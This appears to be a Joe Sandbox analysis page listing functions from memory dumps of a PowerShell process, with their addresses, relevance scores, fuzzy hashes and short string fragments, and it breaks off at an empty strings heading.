Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac669770ca43f6de1ca4c16a69cbe3eaadd3066bb18db473a487903201def6c
Instruction ID: f0ec8600e66f7b82d1c78923f13fb6f4d7f78dc89e6a1d11bffea51518cc8051
Opcode Fuzzy Hash: dac669770ca43f6de1ca4c16a69cbe3eaadd3066bb18db473a487903201def6c
Instruction Fuzzy Hash: 1332F574A01218EFCB15CFA8D494ADDFBB2EF49310F248159E815AB361CB31ED82DB91

Function 00C173A8 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 311a988523f5951e9a19f9455d852159fb0d3bfcd6c8c94d539ed2314ce73c95
Instruction ID: 62a9cf36460e4f5390d6c058e7571e96c743d5c610013f2a63ece2d17d261948
Opcode Fuzzy Hash: 311a988523f5951e9a19f9455d852159fb0d3bfcd6c8c94d539ed2314ce73c95
Instruction Fuzzy Hash: 3DC1A231A04208DFDB15DFA8C844A9DBBB2FF86304F118659E415AB365CB34ED89DB80

Function 00C1F49C Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db5c72cd32af1455fbfc0a0ca27fe22b4014f447476840ca571fdb45cf6b3919
Instruction ID: bc08f3e45a0eac8c2d98d91e3cc9ebbd1142213eccd0372017efdf24fcf189b6
Opcode Fuzzy Hash: db5c72cd32af1455fbfc0a0ca27fe22b4014f447476840ca571fdb45cf6b3919
Instruction Fuzzy Hash: F4C14D71E002098FDF10CFA8D9857DDBBF2AF49314F24813DE425A7294EB749986DB91

Function 071260D0 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d07b88866cdd1e241981e7e07310fcc35a121357b45a1a4fdf6859db24c5ed91
Instruction ID: 60f573d424f67c4d6e7c776286f2b731c4740174e645509571f714cb7da8663c
Opcode Fuzzy Hash: d07b88866cdd1e241981e7e07310fcc35a121357b45a1a4fdf6859db24c5ed91
Instruction Fuzzy Hash: 319195B4B00215DFD715CB98C541AAEBBF2AF89314F158469E405AFBD1CB31EC82DB92

Function 071260AF Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f1d2dfebe5edc3feb10f949d17479ba5ea936eb40c3dc4d0d7b3d7d438eb0df
Instruction ID: 528d5d326ca9f53d548d14f514409b2b40b54f2dbf8b3bc06f69e793796a6545
Opcode Fuzzy Hash: 2f1d2dfebe5edc3feb10f949d17479ba5ea936eb40c3dc4d0d7b3d7d438eb0df
Instruction Fuzzy Hash: C291AFB4B00215DFD715CF58C540A9EBBF2AF89314F158469E405ABBD2C732EC92DB92

Function 00C12AA0 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6dcb9bf188614676abc23048bdde41775e485c1f3317d216b94d84610243a8
Instruction ID: 977a4fba3c13e10e9b9c7492c07f949a109b53895d58126dba70b7564b738e4f
Opcode Fuzzy Hash: ff6dcb9bf188614676abc23048bdde41775e485c1f3317d216b94d84610243a8
Instruction Fuzzy Hash: 56918CB4A002099FCB05CF59C4949AEFBB1FF89310B248669D915AB3A5C735FD91CBA0

Function 07125DCC Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 486a4ad7b8eb1f4891f926a99537038cc562dcf59269286e5e359a954ace1e64
Instruction ID: 9f8a3f3674bd65a6843a2c58054f363d724e3784ee13cbcf997b65a6873f6aca
Opcode Fuzzy Hash: 486a4ad7b8eb1f4891f926a99537038cc562dcf59269286e5e359a954ace1e64
Instruction Fuzzy Hash: E6518DF17002269FCB254F74848037ABBA2AF85350F2984E5D842DB6C1DB35D8B3E761

Function 00C17B70 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 172ad47070af5b9de83892bcaa2cb357bf57fc735f54ee10c24d2f11b5d3be48
Instruction ID: c74918b52ca241ef966aced306ff2741b4d7ed6a946277e4696bee959132e157
Opcode Fuzzy Hash: 172ad47070af5b9de83892bcaa2cb357bf57fc735f54ee10c24d2f11b5d3be48
Instruction Fuzzy Hash: 7471AF30A042098FCB14DF68C894ADEBBF2EF86314F14C56AE415DB791DB31AD86DB90

Function 00C17CDE Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e6c6e96c88af32c8815ea1a133d110d69513671bd19a1c90b7a8e92e4cd69b
Instruction ID: 5fafb929d9d23ec766c94f577ea2c1cda83a36472a51ae856b3c01ff2c05d7b2
Opcode Fuzzy Hash: d3e6c6e96c88af32c8815ea1a133d110d69513671bd19a1c90b7a8e92e4cd69b
Instruction Fuzzy Hash: 13715F70A042089FDB14DFB4D894BEDB7F2BF89304F148569D416AB7A0DB349D86DB90

Function 071251BD Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d6218bba46fa7949317167aaaeaa242807f1654c7b97515bf74a83fff39eb87
Instruction ID: cef9122c8a893be99ad1d84e8656913e807cca8d75e756ab0a63fe9191901873
Opcode Fuzzy Hash: 9d6218bba46fa7949317167aaaeaa242807f1654c7b97515bf74a83fff39eb87
Instruction Fuzzy Hash: 0E51D2B4A00114DFE724CB98C584B6DBBB2EF84304F2185A9E515AF392CB71EC66DF41

Function 00C17901 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e30f241fcb02925ebb83317996b0fa2d49165675c93fcc34133f75f7f033c24
Instruction ID: a5835436eafbb739673eca621b86f5e94d51d79c1bae5b915bb24afb58cc319e
Opcode Fuzzy Hash: 7e30f241fcb02925ebb83317996b0fa2d49165675c93fcc34133f75f7f033c24
Instruction Fuzzy Hash: DE418F317082048FDB15DB34C8586EEBBB2EFCA750F194169E416EB3A1CB359D41DB90

Function 07120B00 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c6e4ccba0b4283660bd07495ba701872ae196beb0ff12b630f6b1eb18c411a7
Instruction ID: b1186f68907b403773dd608501fcea9f6a6aa0331623d82b1513717b5ffb1df5
Opcode Fuzzy Hash: 7c6e4ccba0b4283660bd07495ba701872ae196beb0ff12b630f6b1eb18c411a7
Instruction Fuzzy Hash: EB315BF57001258BCB249B7888403AFB7A5EFC8315F10897AD80ADB780DB32DA62D790

Function 00C17B5B Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef473a517c1eae70b0886a4440fa601be17cdecd004c96cc50fc19213988445
Instruction ID: f8e6174ed04414c3c1a63e022fa1e47f281b2d2ac6cd30768486fb3f0d8ddb72
Opcode Fuzzy Hash: bef473a517c1eae70b0886a4440fa601be17cdecd004c96cc50fc19213988445
Instruction Fuzzy Hash: 1C417270A042089FDB14DFA5C8947DEBBF2BFC9300F148569D016AB7A1DB71AD85DB90

Function 00C12BB0 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091aa4ad222c35fa82a86ed769d1c8f325b766fa4f04a88a9d4fa44e17bf109d
Instruction ID: a1257be19c3c192e2da72243e2c0394df66d8ed614d5a1a5deccc39eaaaa58fe
Opcode Fuzzy Hash: 091aa4ad222c35fa82a86ed769d1c8f325b766fa4f04a88a9d4fa44e17bf109d
Instruction Fuzzy Hash: 99412678A002099FCB05CF59C4949EEFBB1FF49310B258259C915AB365C732FDA1CBA4

Function 071282C9 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bf11ea9df0181a12ba441e0c6b6ae9421c2bbda67bf19cd163f91ed2d645a0b
Instruction ID: a3ccf6807d139b357e7b63ca4d898dc557c0c774bc7b9ce8de03da0ba72d0078
Opcode Fuzzy Hash: 4bf11ea9df0181a12ba441e0c6b6ae9421c2bbda67bf19cd163f91ed2d645a0b
Instruction Fuzzy Hash: 1E3148F2B04020CBD72557AC99116AFB7929FD5318F10886ADA029B780DF32DD5697E2

Function 07121020 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ca3abd9142f2076580be9bef230d70f3d923062e285908ea1ba6d92b9d42705
Instruction ID: d586e85e1334fc1db728d1f701ce20e70f82a7ba1f14022e433ac62a77fada5d
Opcode Fuzzy Hash: 5ca3abd9142f2076580be9bef230d70f3d923062e285908ea1ba6d92b9d42705
Instruction Fuzzy Hash: B7218EB17003697BDB349AB98841B37B69AABC5305F34843AE506CB3C4CF76D852B365

Function 00C196A8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a0420d863ac8277a1570dde252c3feaeb498dedec690a64ac367c5f2a1c4e0e
Instruction ID: 0093c24167a91d6a638c1db9018a7a685ac2f2565b5495cd37f41836a88cbd5e
Opcode Fuzzy Hash: 1a0420d863ac8277a1570dde252c3feaeb498dedec690a64ac367c5f2a1c4e0e
Instruction Fuzzy Hash: DA31AF70A093959FCB02DF68C8A09EABFB0FF4A310B198197D445DB392C634ED45CBA1

Function 0712100E Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb5ca9d8f438970d5e2aac25ace68a789a401e0497151ba19073b4a964c8ee24
Instruction ID: de23e862eb0697dcd32374612faad5afaf89b63c7a22f3978302480c1a0aa97b
Opcode Fuzzy Hash: fb5ca9d8f438970d5e2aac25ace68a789a401e0497151ba19073b4a964c8ee24
Instruction Fuzzy Hash: 7D21BBB13043E96FEB214B798840B733F669FC6304F388426E441CB2C6CA39D8A1A361

Function 07125E61 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94f5bb4e01b1057c79249261c0b4acbbb8981fb3d9e236c4520fe7e3430a621f
Instruction ID: ebf1cb017aa97d33869fa0d3a549555796119be00a074cf74eabde3a3e7923ea
Opcode Fuzzy Hash: 94f5bb4e01b1057c79249261c0b4acbbb8981fb3d9e236c4520fe7e3430a621f
Instruction Fuzzy Hash: BA1127B27000219BD710966DA8413AEF7529BC1314F10C47AEA02DB7D1DF32D822D791

Function 00C19697 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b441b891f4e94b3b2171dbb58b0138bf954be596b69dd3776e30d072c30417a5
Instruction ID: be9fe4357806113adb382e86e939f88aa797d3773f90a949b4e4caf3366aea44
Opcode Fuzzy Hash: b441b891f4e94b3b2171dbb58b0138bf954be596b69dd3776e30d072c30417a5
Instruction Fuzzy Hash: 5A210D74A042099FCB00DF99D8909AEFBB5FF89310B1581A5E909EB352C731FD41DBA1

Function 00C1EEC3 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2376861949.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df73f2b8b5fa9f525554437e8668a4fc54640d069faf004abf2335ef13cfcfd5
Instruction ID: 5e31e667b1d507892be4796fcc121a28d4a78d4e68610930157f19d2f0c3804d
Opcode Fuzzy Hash: df73f2b8b5fa9f525554437e8668a4fc54640d069faf004abf2335ef13cfcfd5
Instruction Fuzzy Hash: 9C111330C00108CBCF24DAE4D5893ECB7B2AF5231AF241029D821F20A1EB749ECAEB11

Function 0097D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2375902587.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_97d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c84f6ce4303db6ece56a87dc08c3e753fb958b822a344422e0989059c303567
Instruction ID: 6c9d260d17f2edca20c19d4f21925a91008e475f05692b136f2cd582eaff2ad2
Opcode Fuzzy Hash: 7c84f6ce4303db6ece56a87dc08c3e753fb958b822a344422e0989059c303567
Instruction Fuzzy Hash: 5101F2B240A3409EEB208A29CCC0B66BFBCDF51324F18D81AED4C4B242C6799941C6B1

Function 0097D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2375902587.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_97d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5995d1d6963aa45d879ec3bd3fff61e0d47a15e82d12543a1aa86d1feebddc9
Instruction ID: a0325d5f78fb6b8ff4b13558fb15ef0b5e967fff48c5983985dbd0f0e3fe15fd
Opcode Fuzzy Hash: d5995d1d6963aa45d879ec3bd3fff61e0d47a15e82d12543a1aa86d1feebddc9
Instruction Fuzzy Hash: 97F0C272406344AEE7108A15CDC4B62FFACEF51334F18C15AED4C4B286C2799840CBB1

Function 07121BAF Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a73b4c4812f561af63ffd0f2aa7a91a0b50b54fa3684c376f7135c0d1530d9ec
Instruction ID: 9548e0481dcf6977cb99b1e0ffbed4be638f597f18635a5027aab4ea3a44a086
Opcode Fuzzy Hash: a73b4c4812f561af63ffd0f2aa7a91a0b50b54fa3684c376f7135c0d1530d9ec
Instruction Fuzzy Hash: 22B012302000408BD341D714CC50B20BB509F83204F18C0C8E404CF252CB33DC03C780

Non-executed Functions

Function 0097DAAC Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2375902587.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_97d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f3e1713df45e449361ce40ac7121b094c04ea2665e09089d2ea0c8b925609da
Instruction ID: b8ecd0b7c590d3fa80a4fd548d618acc1c50a5148ed9477510f07ba3d1dbe3a1
Opcode Fuzzy Hash: 7f3e1713df45e449361ce40ac7121b094c04ea2665e09089d2ea0c8b925609da
Instruction Fuzzy Hash: B92102B26092009FDB04DF14D580B2ABBB9FF94724F24C96DD90E4B641C37AD806C662

Function 0712EE25 Relevance: 11.5, Strings: 9, Instructions: 270COMMON

Download Yara Rule

Strings

tPfq, xrefs: 0712EF51
(lq, xrefs: 0712F080
$fq, xrefs: 0712EE7D
tPfq, xrefs: 0712EF5D
(lq, xrefs: 0712F076
(lq, xrefs: 0712F012
tPfq, xrefs: 0712F04C
(lq, xrefs: 0712F0B5
4'fq, xrefs: 0712F124

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$tPfq$tPfq$tPfq$$fq$(lq$(lq$(lq$(lq
API String ID: 0-2114525439
Opcode ID: e7a4b8ef9e69a7a82c91300d1b5f7b1603cf4c882f1d7625c105821aebab94d0
Instruction ID: 0c600f21ce4114145f5bb8e87e99d27017b8ff29d5ca6a45d2c9517ca79763de
Opcode Fuzzy Hash: e7a4b8ef9e69a7a82c91300d1b5f7b1603cf4c882f1d7625c105821aebab94d0
Instruction Fuzzy Hash: E1A137B0700226AFDB258F58C94576BBBB6EF85310F548459E805AB2C1CB31DC57EBA1

Function 0712E5AD Relevance: 11.5, Strings: 9, Instructions: 209COMMON

Download Yara Rule

Strings

d%lq, xrefs: 0712E795
tPfq, xrefs: 0712E761
tPfq, xrefs: 0712E76D
d%lq, xrefs: 0712E7CA
4'fq, xrefs: 0712E80B
4'fq, xrefs: 0712E7FF
d%lq, xrefs: 0712E727
d%lq, xrefs: 0712E78B
$fq, xrefs: 0712E648

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$d%lq$d%lq$d%lq$d%lq$tPfq$tPfq$$fq
API String ID: 0-3516216882
Opcode ID: 6f7f2601fd39f591520f3ed423487271bd1a89402e95d591e863d0772c95d296
Instruction ID: 205a0f74814dfd524c0a0b7d72a89fc4f28624322e4b2391871689d80c9bb376
Opcode Fuzzy Hash: 6f7f2601fd39f591520f3ed423487271bd1a89402e95d591e863d0772c95d296
Instruction Fuzzy Hash: 5F7137B5B10266DFCB299F69C45967ABBA2AFC4700F148469E8018B3C0DF31DC5ADB91

Function 0712A881 Relevance: 10.2, Strings: 8, Instructions: 169COMMON

Download Yara Rule

Strings

tPfq, xrefs: 0712A95B
4'fq, xrefs: 0712AA0B
4'fq, xrefs: 0712AA17
$fq, xrefs: 0712A8D9
$fq, xrefs: 0712A9E6
$fq, xrefs: 0712A9D6
$fq, xrefs: 0712A8BD
tPfq, xrefs: 0712A967

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq
API String ID: 0-3165298016
Opcode ID: 20ac1c978fc09298cdfeedfa89706b77527ff715586da68040ea38515604bf82
Instruction ID: c53b0f4a11ca7d25f0c7948768d261edd159df3a9b849fc7455b63160e974119
Opcode Fuzzy Hash: 20ac1c978fc09298cdfeedfa89706b77527ff715586da68040ea38515604bf82
Instruction Fuzzy Hash: 77512AF1B00125DFDF298B69C95166ABBA2AF85310F25C069DD468B2C1CF31D863EB91

Function 0712EFEC Relevance: 10.1, Strings: 8, Instructions: 110COMMON

Download Yara Rule

Strings

tPfq, xrefs: 0712F058
(lq, xrefs: 0712F080
4'fq, xrefs: 0712F130
(lq, xrefs: 0712F076
(lq, xrefs: 0712F012
tPfq, xrefs: 0712F04C
(lq, xrefs: 0712F0B5
4'fq, xrefs: 0712F124

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$tPfq$tPfq$(lq$(lq$(lq$(lq
API String ID: 0-4156688077
Opcode ID: 1f6afd909af3d1835189c30045cc8df501dcf9cb79daa87b2239a70389a19a5e
Instruction ID: 95912220539dddd528909edac0fc73b78340ad1e8fd9cb8a7505f7d6550cf932
Opcode Fuzzy Hash: 1f6afd909af3d1835189c30045cc8df501dcf9cb79daa87b2239a70389a19a5e
Instruction Fuzzy Hash: D03127B1B001259FDB288F588910B6B7BB7AF89710F258459E9016B3C0CB31EC53A7E5

Function 07120850 Relevance: 9.0, Strings: 7, Instructions: 206COMMON

Download Yara Rule

Strings

$fq, xrefs: 071208A3
4'fq, xrefs: 07120A75
$fq, xrefs: 071208BF
4'fq, xrefs: 071208E4
4'fq, xrefs: 07120A65
4'fq, xrefs: 071208F0
$fq, xrefs: 071208CB

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq
API String ID: 0-4070656019
Opcode ID: 0133fd6051421b34f29d41a0f4367e2e34583168240cef09159f594f81c5d0f5
Instruction ID: fd24631cf7fe9a2e6b926fd7e2954cbcfcf45d7edcfca4a6cb1e4ae6b83908ef
Opcode Fuzzy Hash: 0133fd6051421b34f29d41a0f4367e2e34583168240cef09159f594f81c5d0f5
Instruction Fuzzy Hash: BC614CB1B002558FDB294B79841167B7BA2AFCA310F24816AD546CB3D1DF31C892D7A1

Function 0712DBC0 Relevance: 7.7, Strings: 6, Instructions: 208COMMON

Download Yara Rule

Strings

$fq, xrefs: 0712DDD6
$fq, xrefs: 0712DCC1
4'fq, xrefs: 0712DCEB
4'fq, xrefs: 0712DCDF
$fq, xrefs: 0712DC66
$fq, xrefs: 0712DCB1

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$$fq$$fq$$fq$$fq
API String ID: 0-1793556278
Opcode ID: 4b378866e7815c2eb0905a875a80341b76b4763499d530c1de7e17db99098d72
Instruction ID: 04fc0dbfc3c5b4471c2796c8157cd630cea0d54449db3ba6cdeed6dea9ba04e7
Opcode Fuzzy Hash: 4b378866e7815c2eb0905a875a80341b76b4763499d530c1de7e17db99098d72
Instruction Fuzzy Hash: 01612AB17242299FCB198F79E4006AB7BA6AFC1311F14C06ED485CB2D1CB71C962E7D1

Function 0712F8A5 Relevance: 7.7, Strings: 6, Instructions: 194COMMON

Download Yara Rule

Strings

XRkq, xrefs: 0712FA25
XRkq, xrefs: 0712FA15
XRkq, xrefs: 0712F8E1
tPfq, xrefs: 0712F984
$fq, xrefs: 0712F8FD
tPfq, xrefs: 0712F990

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: XRkq$XRkq$XRkq$tPfq$tPfq$$fq
API String ID: 0-197451711
Opcode ID: 1ba0ed50f349c5ab19ab70d3086f663f045e13064af676ab32f9767dafd8ed97
Instruction ID: 5a504b09716a1e8671cd701dea707d24a259694907a4f016b0a88dc30d8a7bca
Opcode Fuzzy Hash: 1ba0ed50f349c5ab19ab70d3086f663f045e13064af676ab32f9767dafd8ed97
Instruction Fuzzy Hash: 0C6128B1B002269FDB259F68844166ABBB6AF85710F24C469E8419F3C1CF31DC57DBA1

Function 07127B88 Relevance: 7.7, Strings: 6, Instructions: 187COMMON

Download Yara Rule

Strings

tPfq, xrefs: 07127C2C
$fq, xrefs: 07127B9C
$fq, xrefs: 07127D1A
$fq, xrefs: 07127D26
tPfq, xrefs: 07127C38
$fq, xrefs: 07127CEF

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: tPfq$tPfq$$fq$$fq$$fq$$fq
API String ID: 0-364545437
Opcode ID: e15eb3e8ba9e5a5e956e0274d5ba3ba46bc115d1b085370ae3eac46e9ade7df1
Instruction ID: 657482f726bc61d1f3629cd52877b6089ccc89639c0165647f1b741d53d2a2ae
Opcode Fuzzy Hash: e15eb3e8ba9e5a5e956e0274d5ba3ba46bc115d1b085370ae3eac46e9ade7df1
Instruction Fuzzy Hash: 33515BB17143669FDB354B79C841B77BBA6EF82320F24847AD6458B2D1CB31C862D391

Function 07120548 Relevance: 6.4, Strings: 5, Instructions: 148COMMON

Download Yara Rule

Strings

$fq, xrefs: 0712060D
$fq, xrefs: 071205D4
$fq, xrefs: 07120619
4'fq, xrefs: 07120642
4'fq, xrefs: 07120636

Memory Dump Source

Source File: 00000001.00000002.2390650443.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7120000_powershell.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq$$fq$$fq$$fq
API String ID: 0-3759051638
Opcode ID: dc236f6a8a27462c109fca433885b51a09efa835f3ca04a3c39436b699881edb
Instruction ID: 6c5501eeaefad2103443195320710711937309e5ff17ec3bd002626b34668359
Opcode Fuzzy Hash: dc236f6a8a27462c109fca433885b51a09efa835f3ca04a3c39436b699881edb
Instruction Fuzzy Hash: 1F4169B1B002169FCB265F7484107BA7BB2DFC9210F14816AD945CB6C1DF32C993E7A6

Function 0712E6AE Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

